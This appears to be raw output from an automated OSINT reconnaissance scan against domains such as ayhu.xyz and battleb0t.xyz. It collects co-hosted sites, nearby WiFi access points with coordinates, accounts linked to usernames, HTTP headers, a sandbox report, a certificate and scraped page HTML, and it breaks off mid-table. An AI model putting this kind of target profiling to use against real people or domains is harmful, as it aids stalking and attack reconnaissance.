Z683yfnj1pOwmIp-ezEp2JWb8TkZZ0zoMJBnNWz-dER92U4KjRMwAWRs684SongNmPEIXYAgqclvfJ3msrReLNbVn2C0cz7wvPKboCqEwy5ipFMXgNiuhbJpqavDTbOw2pcmk4nLwQO7-0fq6lR-AioIh72_7f-dcCDyp3CvaV2lSxONdGbwSj69Uzxdx9pjqKiA7eKWgpDp1A1TT4OM1UPvdKoDNlfXS-kt53TGtcDj_tr5ZSCxVfBj5Eaq6vy-dzTe3un5fL0Jw93IdI7hmq3BtVNMvvG3ttwva1yDFbKbbzAoei-_xuiypX7ONnqllk5lT1u_-s9W-YqxnvXblOasj5xt36xai8HGELg30c69mi7dS6KFtoe8onnoqh_Jv5x6H6CEBPpBlJkQ-7Wml_gwi2q6d0tQ_ZdaaMoOXxHsxIyK5qGvyrxIKQoaob4JTcbfXfzc5V6fJoXtr9RSoGgPAroX9StxeMfnAcZJZ38lwB2R_OkZXBx7EFcRTvZsqwNSAcBE597i5gxzUV9OIg9fnTaoLIGC6pMfXSOrCdhVP4gGEX4Bccu5X10qZzo6Szn5JgpstSZeqAMVuU9TWGPYdK5uOwlHRiWmjX7UntfXmsGqJLQN_MyyArtIqHW_GuUvvub4g6fNvemcAOPIu9NS3HWmMTmUN4ACMa423i12vOJGRP7TcmceYbGSntTQh51WDUHuY7LdwoWtDpwMlk9-stOh87SR4LOrDyvW1iZRowgiTy2GmxHJlIHKCRhXnA5KaH4pnPJkKkhrPoRN6DTCQDr15qpBgZxUmF4wezI7yU8i7hxFvjA2vpTMuEjzuFK5Xab8ZS1nR5YLbQiKD3ROG0S6bl-4nxyf66OU-8Xv4FaugupxS3e-wlAwiX3hxmLNdGdmQn9eyC4_2RwUK2WWp5b7e4SAi9-pAVBzMefue3T2KHTLHF643icuFWjUauohcHM9aP5V8YQkXvauXJeiafKXSGCb142muLvzgJ9tWui0nHCx7aGYnZ5KCXJJAPsMf9OR8piOc-bOw90DQdaaAoQce9uq1wQGOtC7qhcYnC54DqDoEYzADwA9eHH9CWAG4K79Bs3Vtk5_YaWGKevDuxwe2PI4tgDIlPhm0aaMmefu_Aqbmk6Nh3efYd6tebEuF1GGAbp894vPoKIV_oMOG4605Orlbta-mL3BdBLdomEjXGBNzJc8zOt_diWLDMArzlhmqHj68HR17Jaa_r6ERT_jArQXozZtM_B3L5O8SpcafOJWm3x_EH-cSS-ttAlAlAFa0wgnswXzQF8jvtcMH7wOU4U6LjP8DMTOtT18J0nltl0j_q-DNG4lBHonjmIjyRSP8oBxk-3z89_7YNTov0awtqgzLFZw2_mSARwNl4_HaPezvCevT53qGnFReXcG3RzOMm4zSBZbENl_DwydIdBN0QqU0z3ekKIj0DHHzeDbwvLRQiV0Lv01I4DZBYzgAdCYmkN3aWrG0sAU92LemS02Ukd_enHt1XRhTQOnUlyr42CJb5OOWo8CjNFcGn16guPRfUma268s38K2-wnhjS9iCXiymmGF-AAdAizqUKdabbQOSsatJ602VLlNMiwTbinDbOME_fkBdTGzKnt5g_beyji9YWF9g5kjIdThtdFTLZ7VtxqQe64uUOYy3ZMXGyBjPj32wUf-c45ZB1IslXSI3TZ3dwmgQZ-iw9MFsb5EQblUq7mhT6th">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '13393',
cRay: '7c5f8c594cb34339',
cHash: '405751743fca02b',
cUPMDTk: "\/lol.html?__cf_chl_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'eSl90ERW3ieYQBiJ/CvInfpugLrCuGqtrxfN7Hff3XV1tnjtcokhOvtXLaw36vmuW/PZRZbPFRsBG1FZ2o1L9/qlyM29SttBrPr40sLGiM5zROAIfmkLKaU7gxLqLGeRmXOxLm0iruqXtWXcZfwzLJMR0QDa6PkszA2FQ43qwQdSl1Fas7lyf05ZYuhd21mKW7cO3qwZeh7EGOKQrSA2vqJVYFosW/VZvSBGX51hzStLgJo3UlZTpeKFoRGBNXR72ajQEJiUb1nCtKKxYTlVZS5ZMnpJ22NtZ33eAOm1lxwFp0ZWMwtEtyfr7+KjIQ7sSru0tnVtRMYbJHwTDL1YqCRM5I3BrwhMSJldfYZdxbXvKROe8SujCKguS6whGqpyPhrBZ0ynuTVosC8rK1X1RTGfwKn+lPWLzhRyW3E937dmzZ7Hr4MVk+jCtkCg7+HiFEo7Z5MPv1Dw/bUNeEjjhnMO6Bk/fpz1g8p9agnrrAYImdotjjffG+sx7LYboUY2eNvy7Cmsh5FjNxiOeltcpgD/DjxarQtoa+6blRoBMw8jV7vrsKw7K7t0fZ6oSnZa',
t: 'MTY4Mzg2MTg2MS4zMjkwMDA=',
m: 'wei6RtcHCTh5k6jXLRR9uxE1j0nSB1DRW6i/4ZVDPwA=',
i1: 'b4n+etCkfjlnsH7ziL0wjQ==',
i2: 'jFCNa6uhaxi0l2WjI6PNAA==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c594cb34339');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c594cb34339';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 02:44:24 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.109.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:01:E3:56:FE:F7) | 52.3759, 4.8975 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Disqus (Category: social)
https://disqus.com/by/ayhu/ | ayhu |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5d3adbfbad871d-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.6.166 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | art_vacation5.0 (Net ID: 00:01:9F:30:06:7C) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:48:40 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 24, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://ihealthlabs.us4.list-manage.com/track/click?u=c8c5e66c560454c0a498d1a07&id=612aad4294&e=9a90f4a41f', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-22', u'name': u'Fails to load modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" failed to load missing module "MDMRegistration.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "netapi32.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "bcrypt.dll" - [base:fe4e0000; Status:c0000003]\n "msedge.exe" failed to load missing module "d3d11.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "%WINDIR%\\system32\\hevcdecoder.dll" - [base:0; Status:c0000135]\n "msedge.exe" failed to load missing module "d3d12.dll" - [base:0; Status:c000000d]'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4280:120:WilError_01"\n "InternetShortcutMutex"\n "SM0:3720:120:WilError_01"\n "Local\\SM0:3720:304:WilStaging_02"\n "Local\\SM0:3720:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "Local\\SM0:4280:304:WilStaging_02"\n "SM0:4280:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4280:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:4280:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:4280:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"23.227.38.65:443"\n "23.227.60.200:443"\n "34.160.129.82:443"\n "172.66.43.55:443"\n "69.16.175.42:443"\n "52.92.249.169:443"\n "104.17.25.14:443"\n "157.240.22.25:443"\n "185.146.173.20:443"\n "142.251.214.130:443"\n "142.251.32.34:443"\n "172.64.131.28:443"\n "13.227.74.57:443"\n "34.96.102.137:443"\n "142.250.72.206:443"\n "13.227.74.106:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.qikify.com"\n "api.revy.io"\n "api.userway.org"\n "bff-api.automizely.com"\n "bundle.revy.io"\n "cdn.jsdelivr.net"\n "cdn.pagefly.io"\n "cdn.shopify.com"\n "cdn.userway.org"\n "cdnjs.cloudflare.com"\n "code.jquery.com"\n "connect.facebook.net"\n "d1639lhkj5l89m.cloudfront.net"\n "dev.visualwebsiteoptimizer.com"\n "downloads.mailchimp.com"\n "dttrk.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "fonts.shopifycdn.com"\n "googleads.g.doubleclick.net"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<meta name="twitter:site" content="@ihealthlabsus">" (Indicator: "twitter")\n "<meta name="twitter:card" content="summary_large_image">" (Indicator: "twitter")\n "<meta name="twitter:title" content="iHealth COVID-19 Antigen Rapid Test">" (Indicator: "twitter")\n "<meta name="twitter:description" content="iHealth is making personal healthcare management easier for everyone! Improve your health by tracking your vitals data: blood pressure\n blood glucose\n blood oxygen & pulse rate\n and more. Remote Patient Monitoring empowers providers to offer comprehensive care for patients. Increase patient satisfaction\n gain ROI.">" (Indicator: "twitter")\n "<script>window.ShopifyPaypalV4VisibilityTracking = true;</script>" (Indicator: "paypal")\n ""https:\\/\\/twitter.com\\/ihealthlabsus"," (Indicator: "twitter")\n ""https:\\/\\/www.facebook.com\\/iHealthus\\/"," (Indicator: "facebook.com")\n "<a class="social-icons__link" href="https://www.facebook.com/iHealthus/" aria-describedby="a11y-external-message"><svg aria-hidden="true" focusable="false" role="presentation" class="icon icon-facebook" viewBox="0 0 20 20"><path fill="#444" d="M18.05.811q.439 0 .744.305t.305.744v16.637q0 .439-.305.744t-.744.305h-4.732v-7.221h2.415l.342-2.854h-2.757v-1.83q0-.659.293-1t1.073-.342h1.488V3.762q-.976-.098-2.171-.098-1.634 0-2.635.964t-1 2.72V9.47H7.951v2.854h2.415v7.221H1.413q-.439 0-.744-.305t-.305-.744V1.859q0-.439.305-.744T1.413.81H18.05z"/></svg><span class="icon__fallback-text">Facebook</span>" (Indicator: "facebook.com")\n "<a class="social-icons__link" href="https://twitter.com/ihealthlabsus" aria-describedby="a11y-external-message"><svg aria-hidden="true" focusable="false" role="presentation" class="icon icon-twitter" viewBox="0 0 20 20"><path fill="#444" d="M19.551 4.208q-.815 1.202-1.956 2.038 0 .082.02.255t.02.255q0 1.589-.469 3.179t-1.426 3.036-2.272 2.567-3.158 1.793-3.963.672q-3.301 0-6.031-1.773.571.041.937.041 2.751 0 4.911-1.671-1.284-.02-2.292-.784T2.456 11.85q.346.082.754.082.55 0 1.039-.163-1.365-.285-2.262-1.365T1.09 7.918v-.041q.774.408 1.773.448-.795-.53-1.263-1.396t-.469-1.864q0-1.019.509-1.997 1.487 1.854 3.596 2.924T9.81 7.184q-.143-.509-.143-.897 0-1.63 1.161-2.781t2.832-1.151q.815 0 1.569.326t1.284.917q1.345-.265 2.506-.958-.428 1.386-1.732 2.18 1.243-.163 2.262-.611z"/></svg><span class="icon__fallback-text">Twitter</span>" (Indicator: "twitter")\n "<a class="social-icons__link" href="https://www.linkedin.com/company/ihealth-lab/about/" aria-describedby="a11y-external-message">" (Indicator: "linkedin.com")\n "www.facebook.com" (Indicator: "facebook.com")\n "www.youtube.com" (Indicator: "youtube")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-203', u'name': u'Tries to access LNK files (Windows shortcut)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Microsoft Edge.lnk"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00004280]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_2]- [targetUID: 00000000-00004280]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.45\\Ruleset Data]- [targetUID: 00000000-00004280]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\4280_1753251559\\Filtering Rules]- [targetUID: 00000000-00004280]\n "0f196ca9-49bd-4f3c-a446-6670b2f350fc.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 270742"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00004280]\n "0ba2ec1e-18bb-4a7d-80cb-d06eae98d168.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 2264512"- [targetUID: N/A]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00004280]\n "000013.ldb" has type "data"- [targetUID: N/A]\n "f_0004de" has type "data"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00004280]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00004280]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\4280_1753251559\\Filtering Rules-AA]- [targetUID: 00000000-00004280]\n "000014.ldb" has type "data"- [targetUID: N/A]\n "urlref_httpsihealthlabs.us4.list-manage.comtrackclicku_c8c5e66c560454c0a498d1a07_id_612aad4294_e_9a90f4a41f" has type "HTML document UTF-8 Unicode text with very long lines with CRLF CR LF line terminators"- [targetUID: N/A]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%TEMP%\\4280_1931108865\\edge_autofill_field_data.json]- [targetUID: 00000000-00004280]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts random domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdn.pagefly.io" seems to be random\n "cdn.shopify. | 185.199.110.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-fastly-request-id: 4232179a2468cad7d8e788f0a4fe958396bfc091 | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 2 | 0 | 2 | 0 | None | malsup.github.io | 185.199.111.153 |
| 2023-05-12 02:47:42 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 35.229.48.116:80 | 35.229.48.116 |
| 2023-05-12 02:44:42 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:23:36:1a:72:6e:fc:71:09:49:b1:35:f9:b5:e5:28:80:de
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:52:05 2023 GMT
Not After : Jun 11 12:52:04 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:bd:f9:3b:c0:6f:f8:ab:e7:35:d5:ff:95:55:28:
87:2c:f3:42:5c:6a:f2:dc:b2:0f:7b:b2:97:bc:68:
c2:d8:25:b1:da:3c:de:c9:ee:4a:54:a6:08:c9:a0:
d5:34:39:c8:96:b7:d1:e3:5d:f3:2b:db:f7:37:5d:
57:65:f7:3d:16:c9:ad:d6:e6:bb:bc:97:c6:1c:bc:
c7:1d:a0:c9:cc:3a:d4:e1:69:37:d2:58:c2:fe:42:
4e:90:a6:4c:72:5e:0f:c5:0a:f9:18:b1:c7:54:af:
b4:03:13:bc:ce:85:b6:0d:a5:99:fc:98:b2:37:24:
39:66:7b:f1:78:3b:4b:9e:51:be:75:ad:a6:19:8d:
be:a9:ca:f2:df:b7:73:9f:c6:14:09:e1:46:c4:93:
a4:45:7c:eb:1e:47:42:88:d1:8d:e7:29:c0:07:7b:
ad:57:d3:0b:cf:a1:a1:bc:65:12:20:8e:92:81:50:
55:40:69:4e:0d:62:29:ab:00:e6:81:6e:83:3a:16:
09:da:2a:57:32:b1:5d:79:74:f0:1d:02:e0:52:6d:
d5:85:2d:cb:f6:ef:5e:8f:03:a0:14:64:19:bb:71:
65:85:3e:bc:4e:e8:75:85:4b:a0:7d:df:3f:2a:67:
46:82:ea:56:e3:e5:01:c8:49:e2:f1:a3:b1:04:af:
98:45:24:1b:7e:2d:57:39:72:ff:5a:94:89:31:42:
ae:19:e5:2d:eb:c8:08:fc:be:37:02:5d:04:1a:b3:
f0:62:42:14:91:38:7a:96:77:5e:53:eb:f1:d9:8e:
45:46:0d:65:07:6b:18:0a:65:96:3c:4e:b9:77:05:
52:b4:4d:17:73:72:d9:49:c8:16:75:9c:84:35:12:
73:86:4f:08:27:5d:f3:e9:85:10:9a:ff:e4:3a:63:
ef:83:9f:03:76:a4:3f:ac:72:d5:f4:bb:3a:60:bc:
21:1c:e8:7c:52:79:bd:fe:19:9a:69:78:22:a6:5d:
64:8d:04:55:f3:ec:4d:6c:47:45:2c:6c:9e:cc:14:
be:67:76:25:be:fd:51:60:a1:2e:10:af:1b:46:0c:
e9:ec:3a:3c:0b:c9:2a:97:61:1c:a8:6a:9d:53:cd:
2d:6c:4e:66:f4:08:01:29:89:61:ff:d2:73:d2:a1:
da:94:32:dc:5c:78:ad:19:fa:b3:fb:26:0f:35:c2:
87:17:c9:ae:6f:c7:ce:81:d6:7d:27:95:3b:49:39:
e6:cf:30:85:95:79:a1:35:71:86:5b:66:f7:9d:ae:
96:d5:9a:1d:e3:e0:76:fe:b7:a0:b5:1a:16:0b:1b:
5e:d4:d9:5b:b6:4a:4d:33:65:03:80:b9:ab:69:35:
1b:42:d7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
E6:0D:FB:5E:53:09:44:30:22:92:3D:83:C3:34:06:A0:52:1B:50:06
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
13:c5:42:8e:df:cd:70:e8:7c:0e:70:c9:5a:83:25:16:cc:62:
c3:f9:d5:c4:22:3b:ce:7f:81:fd:60:05:88:21:1a:e5:70:1c:
36:22:ce:db:ed:26:19:e2:1b:04:4d:ab:65:39:6d:00:51:3b:
cc:9b:3f:79:54:95:3e:31:af:d8:e6:03:1b:cc:d5:95:be:82:
cd:0b:e5:96:8f:6f:35:dd:91:c9:94:47:2b:3a:45:e8:d6:90:
9a:f6:27:ba:63:ff:75:94:72:de:3e:47:3f:d3:d4:41:71:e3:
3f:56:35:21:79:53:05:d2:4b:7c:f6:49:cf:40:3d:7f:f2:f4:
3d:17:14:59:24:3e:50:d8:45:4a:75:44:e1:73:c8:35:32:f2:
12:9e:aa:4b:a4:d5:91:49:4b:5d:ba:80:98:b5:1e:6a:11:cf:
b0:5f:4d:0f:57:ad:69:b3:6b:16:1c:dd:75:b2:fe:57:1f:11:
ae:d7:db:50:93:3c:e1:e8:26:9c:cc:0a:18:7c:b4:5d:5b:33:
d4:f5:18:f8:96:6e:cb:73:1d:80:63:f6:bb:c8:51:5e:dd:31:
fe:d5:d8:6f:b8:13:03:f9:14:44:36:23:9a:a2:41:54:b4:39:
df:20:21:8b:35:e6:b5:0b:7c:63:1f:77:c7:00:93:73:7a:f3:
93:fe:79:56
|
| 2023-05-12 03:24:52 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | Turkey | Bursa, Bursa, 16, Turkey, TR |
| 2023-05-12 02:45:22 | Physical Location | No | ipapi.co | 0 | 0 | 4 | 0 | None | Ashburn, Virginia, VA, United States, US | 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | SoundCloud (Category: music)
https://soundcloud.com/ayshoo | ayshoo |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | crowdin (Category: hobby)
https://crowdin.com/profile/login | login |
| 2023-05-12 03:09:43 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 121.97.148.34.bc.googleusercontent.com | 34.148.97.121 |
| 2023-05-12 03:18:06 | URL (Purely Static) | No | Page Information | 0 | 0 | 3 | 0 | None | http://nwapi.battleb0t.xyz | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixels API is experiencing some technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixels API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixels API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
